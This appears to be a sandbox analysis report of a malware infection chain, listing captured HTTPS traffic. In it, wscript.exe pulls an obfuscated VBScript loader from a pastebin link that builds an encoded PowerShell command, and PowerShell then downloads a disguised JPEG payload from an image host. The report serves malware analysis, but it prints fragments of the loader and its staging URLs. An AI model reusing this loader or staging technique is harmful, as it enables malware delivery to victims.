uploaddeimagens.com.br

www.evolve27.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49706	172.67.19.24	443	3620	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:22 UTC	328	OUT	GET /raw/8RAqVdhv HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: pastebin.com Connection: Keep-Alive
2024-05-04 07:48:23 UTC	388	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:23 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sat, 04 May 2024 07:48:23 GMT Server: cloudflare CF-RAY: 87e6e357fd4f69b2-LAX
2024-05-04 07:48:23 UTC	981	IN	Data Raw: 33 36 35 37 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 69 6e 61 75 64 69 74 6f 20 2c 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 2c 20 61 62 75 73 69 76 61 6d 65 6e 74 65 20 2c 20 65 6e 64 75 72 65 6e 74 61 72 20 2c 20 6c 69 6d 69 6e 61 72 63 61 20 2c 20 43 61 6d 61 20 2c 20 6c 69 6d 69 6e 61 72 63 61 31 0d 0a 20 20 20 20 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 61 62 75 73 69 76 61 6d 65 6e 74 65 20 20 3d 20 22 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 Data Ascii: 3657 dim inaudito , phlebomalacia , abusivamente , endurentar , liminarca , Cama , liminarca1 phlebomalacia = " " abusivamente = "" & endurentar & phlebomalacia & endurentar & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTr
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 51 42 75 44 67 54 72 65 48 51 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 44 67 54 72 65 42 45 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 43 44 67 Data Ascii: urentar & phlebomalacia & endurentar & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & endurentar & phlebomalacia & endurentar & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & endurentar & phlebomalacia & endurentar & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDg
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 75 72 65 6e 74 61 72 20 26 20 22 51 42 69 44 67 54 72 65 45 4d 44 67 54 72 65 62 44 67 54 72 65 42 70 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 34 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 49 44 67 54 72 65 42 6a 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 6a 44 67 54 72 65 47 67 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 59 Data Ascii: urentar & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreY
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 65 44 67 54 72 65 34 44 67 54 72 65 44 49 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 6b 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 Data Ascii: eDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & endurentar & phlebomalacia & endurentar & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & endurentar & p
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 74 61 72 20 26 20 22 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 62 67 42 31 44 67 54 72 65 47 77 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 65 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 77 42 6c 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 Data Ascii: tar & "QDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTre" & endurentar & phlebomalacia & endurentar & "wBlDgTreFQDgTre" & endurentar & phlebomalacia & endurentar & "QB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDg
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 44 67 54 72 65 56 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 50 44 67 54 72 65 47 59 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 Data Ascii: DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTre" & endurentar & phlebomalacia & endurentar & "QBuDgTreGQDgTreSQBuDgTr
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 72 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 34 44 67 54 72 65 54 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 Data Ascii: eHIDgTredDgTreBJDgTreG4DgTre" & endurentar & phlebomalacia & endurentar & "DgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTre" & endurentar & phlebomalacia & endu
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 44 67 54 72 65 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 45 4d 44 67 54 72 65 62 77 42 75 44 67 54 72 65 48 59 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 58 51 44 67 54 72 65 36 44 67 54 72 65 44 6f 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 Data Ascii: malacia & endurentar & "DgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTre" & endurentar & phlebomalacia & endurentar & "QByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgT
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 44 67 54 72 65 45 45 44 67 54 72 65 56 51 42 55 44 67 54 72 65 45 38 44 67 54 72 65 54 51 42 42 44 67 54 72 65 45 4d 44 67 54 72 65 51 51 42 50 44 67 54 72 65 43 34 44 67 54 72 65 56 67 42 43 44 67 54 72 65 43 34 44 67 54 72 65 53 44 67 54 72 65 42 76 44 67 54 72 65 47 30 44 67 54 72 65 22 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 26 20 65 6e 64 75 72 65 6e 74 61 72 20 26 20 22 51 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 62 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 30 44 Data Ascii: DgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTre" & endurentar & phlebomalacia & endurentar & "QDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0D
2024-05-04 07:48:23 UTC	1369	IN	Data Raw: 67 44 67 54 72 65 48 30 44 67 54 72 65 22 0d 0a 20 20 20 20 20 61 62 75 73 69 76 61 6d 65 6e 74 65 20 3d 20 52 65 70 6c 61 63 65 28 20 61 62 75 73 69 76 61 6d 65 6e 74 65 2c 20 65 6e 64 75 72 65 6e 74 61 72 20 2b 20 70 68 6c 65 62 6f 6d 61 6c 61 63 69 61 20 2b 20 65 6e 64 75 72 65 6e 74 61 72 20 2c 20 22 5a 22 29 0d 0a 20 20 20 20 20 53 65 74 20 43 61 6d 61 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 20 20 20 20 20 69 6e 61 75 64 69 74 6f 20 3d 20 28 22 24 28 40 28 e2 97 80 28 40 c3 b8 e2 98 9e 40 e2 88 9e 64 69 67 40 c3 b8 e2 98 9e 40 e2 88 9e 20 3d 20 27 22 29 20 26 20 61 62 75 73 69 76 61 6d 65 6e 74 65 20 20 26 20 22 27 22 0d 0a 20 20 20 20 20 69 6e 61 75 64 69 74 6f 20 Data Ascii: gDgTreH0DgTre" abusivamente = Replace( abusivamente, endurentar + phlebomalacia + endurentar , "Z") Set Cama = WScript.CreateObject("WScript.Shell") inaudito = ("$(@((@@dig@@ = '") & abusivamente & "'" inaudito

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49707	172.67.215.45	443	1672	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:37 UTC	124	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-05-04 07:48:38 UTC	696	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:38 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xfqwwDJqrnxfpWp%2FnaBuZBf5Q94aLMBJgZUrWaW%2Fxt7qJxKSZd7VVL5CqVgkkHGtx5%2B4O2PcKUd9IOrS6CMEQRttDW4CLmC51l1eomCs%2B78OgFV4lO4nuvdBcDQqUd4V%2FIc3pni3coat"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e3ba5d717bbb-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:48:38 UTC	673	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jk
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 Data Ascii: 2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
